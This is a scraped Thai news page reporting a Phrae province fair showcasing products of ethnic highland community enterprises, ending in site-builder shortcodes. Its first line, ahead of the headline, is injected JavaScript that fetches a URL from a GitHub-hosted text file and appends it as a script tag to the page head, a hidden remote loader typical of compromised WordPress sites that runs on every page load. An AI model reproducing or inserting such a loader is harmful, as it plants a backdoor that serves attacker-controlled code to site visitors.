;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); จ.แพร่ จัดกิจกรรม “ชม ชิม ช็อป ผลิตภัณฑ์วิสาหกิจชุมชนชาติพันธุ์จังหวัดแพร่ สู่ผู้ประกอบการรุ่นใหม่” - ThaiReference | อาสาไทยยืนยัน
จ.แพร่ จัดกิจกรรม “ชม ชิม ช็อป ผลิตภัณฑ์วิสาหกิจชุมชนชาติพันธุ์จังหวัดแพร่ สู่ผู้ประกอบการรุ่นใหม่”

ที่กาดสามวัย เทศบาลเมืองแพร่ ตำบลในเวียง อำเภอเมืองแพร่ จังหวัดแพร่ นายคุณากร คชหิรัญ รองผู้ว่าราชการจังหวัดแพร่ เป็นประธานเปิดงาน “ชม ชิม ช็อป ผลิตภัณฑ์วิสาหกิจชุมชนชาติพันธุ์จังหวัดแพร่ สู่ผู้ประกอบการรุ่นใหม่” ภายใต้โครงการพัฒนาชุมชนบนพื้นที่สูงสู่ผู้ประกอบการสังคมรุ่นใหม่ นายธนัฏฐ์โชค บุญพงศ์ปริตร ผู้อำนวยการศูนย์พัฒนาราษฎรบนพื้นที่สูงจังหวัดแพร่ กล่าวรายงาน

“กรมพัฒนาสังคมและสวัสดิการ กระทรวง การพัฒนาสังคมและความมั่นคงของมนุษย์ มีภารกิจที่เกี่ยวข้องกับราษฎรบนพื้นที่สูง ในด้านการพัฒนาสังคม การจัดสวัสดิการสังคม การสังคมสงเคราะห์ การคุ้มครองและพิทักษ์สิทธิ และการให้บริการสวัสดิการสังคม รวมถึงการส่งเสริมและสนับสนุนการพัฒนาสังคมและการจัดสวัสดิการสังคมโดยการมีส่วนร่วมของภาคส่วนต่างๆ ที่เกี่ยวข้อง ซึ่งจากสถานการณ์ความท้าทายของราษฎรกลุ่มเป้าหมาย ที่ยังคงประสบกับปัญหาในด้านต่างๆ ที่มีความหลากหลายด้าน เช่น คุณภาพชีวิต การเข้าถึงสวัสดิการ ปัญหาด้านเศรษฐกิจและสังคม ปัญหาเรื่องการประกอบอาชีพเพื่อสร้างรายได้ โดยเห็นความสำคัญ ของทุนทางสังคมในชุมชนบนพื้นที่สูง ที่มีอัตลักษณ์ ประเพณี วัฒนธรรม ผลิตภัณฑ์ชุมชน และธรรมชาติที่งดงาม มาสนับสนุนในการส่งเสริม พัฒนาด้านอาชีพและรายได้ของราษฎรบนพื้นที่สูงให้มีคุณภาพชีวิตที่ดีมีรายได้เพิ่มขึ้น และเพื่อแก้ไขปัญหา ความยากจน ลดความเหลื่อมล้ำทางสังคม พัฒนาเศรษฐกิจฐานรากจากพื้นฐาน Soft Power และชุมชนบนพื้นที่สูงย่อมเกิดการพึ่งพาตนเองได้อย่างยั่งยืน

“ศูนย์พัฒนาราษฎรบนพื้นที่สูงจังหวัดแพร่ เป็นหน่วยงานในสังกัดกองพัฒนาสังคมกลุ่มเป้าหมายพิเศษ  กรมพัฒนาสังคมและสวัสดิการ มีภารกิจที่เกี่ยวข้องกับราษฎรบนพื้นที่สูง ในด้านการพัฒนารูปแบบ แนวทางในการพัฒนาสังคม ส่งเสริม สนับสนุน และประสานการดําเนินงานการพัฒนาสังคม จึงจัดทำโครงการพัฒนาชุมชน พื้นที่สูง สู่ผู้ประกอบการสังคมรุ่นใหม่ เพื่อยกระดับเศรษฐกิจฐานรากชุมชนบนพื้นที่สูง ส่งเสริม พัฒนา ต่อยอดอาชีพ ผลิตภัณฑ์ การท่องเที่ยวเชิงวัฒนธรรม ตามวิถีประเพณี ความเชื่อ อัตลักษณ์ และภูมิปัญญาของราษฎร บนพื้นที่สูง ให้มีรายได้ มีอาชีพ ส่งเสริมให้เกิดการพัฒนาเศรษฐกิจจากฐานรากสู่การเป็นวิสาหกิจชุมชน และเตรียมความพร้อมสู่การเป็นวิสาหกิจเพื่อสังคม (SE) โดยใช้ทุนทางสังคมและการผลิตที่เป็นมิตรกับสิ่งแวดล้อม เพื่อให้กลุ่มราษฎรบนพื้นที่สูงมีความมั่นคงทางเศรษฐกิจ มีเกียรติ มีศักดิ์ศรี ความเป็นมนุษย์ สามารถดำรง          รักษา วิถีชีวิตอัตลักษณ์ของชุมชนให้คงอยู่ สร้างความสามัคคีปรองดอง ขจัดความยากจน ลดความเหลื่อมล้ำทางสังคม อยู่ร่วมกันเป็นสังคมพหุวัฒนธรรม จึงกำหนดให้มีกิจกรรมการจัดงาน “ชม ชิม ช็อป ผลิตภัณฑ์วิสาหกิจชุมชนชาติพันธุ์จังหวัดแพร่ สู่ผู้ประกอบการรุ่นใหม่” ภายใต้โครงการ พัฒนาชุมชนบนพื้นที่สูง สู่ผู้ประกอบการสังคมรุ่นใหม่

การจัดงานในครั้งนี้ มีวัตถุประสงค์คือ  1) เพื่อส่งเสริมสนับสนุนการดำเนินงานตามแผนการจัดตั้งวิสาหกิจชุมชน  2) เพื่อส่งเสริมและพัฒนาผลิตภัณฑ์ชุนบนพื้นที่สูง เข้าสู่การรับรองมาตรฐานประเภทต่างๆ และ 3) เพื่อส่งเสริมและพัฒนาการผลิตที่เป็นมิตรกับสิ่งแวดล้อม เทคโนโลยี นวัตกรรม และการจัดจำหน่าย ในสังคมยุคใหม่ และกำหนดขึ้นระหว่างวันที่ 30  กรกฎาคม –  1 สิงหาคม พ.ศ. 2567 เวลา 10.00 – 21.00 น. ณ กาดสามวัย เทศบาลเมืองแพร่ ตำบลในเวียง อำเภอเมืองแพร่ จังหวัดแพร่ ภายในงานมีกิจกรรมประกอบด้วย การแสดงวิถีชีวิตกลุ่มชาติพันธุ์ของจังหวัดแพร่ 9 ชาติพันธุ์ ได้แก่ ไทยวน ไทลื้อ ไทใหญ่ อึมปี้ กะเหรี่ยง ม้ง        มลาบรี และอาข่า

กิจกรรมตลอดการจัดงานภายในงาน อาทิ นิทรรศการอัตลักษณ์และประเพณีวัฒนธรรมท้องถิ่น, การสาธิตภูมิปัญญาทางวัฒนธรรมแบบมีชีวิต, พิธีเปิดงาน, การแสดงศิลปวัฒนธรรมจากชาติพันธุ์, การจําหน่ายสินค้าวิสาหกิจชุมชนและสินค้าทางวัฒนธรรมของกลุ่มชาติพันธุ์, การแสดงดนตรี

ธีรพงษ์ ธงออน/แพร่

[dsm_icon_divider use_icon=”on” font_icon=”||divi||400″ use_icon_font_size=”on” icon_font_size=”25px” divider_style=”dashed” _builder_version=”4.25.2″ _module_preset=”default” module_alignment=”center” global_colors_info=”{}”][/dsm_icon_divider]
[dsm_blog_carousel posts_number=”20″ posts_offset=”1″ include_categories=”3,5,4″ use_date=”off” use_category=”on” use_author=”off” use_readmore=”on” readmore_text=”อ่านเพิ่ม…” post_equal_height=”on” _builder_version=”4.25.2″ _module_preset=”default” title_font_size=”25px” min_height=”482px” custom_margin=”||639px||false|false” custom_padding=”||340px|||” global_colors_info=”{}”][/dsm_blog_carousel]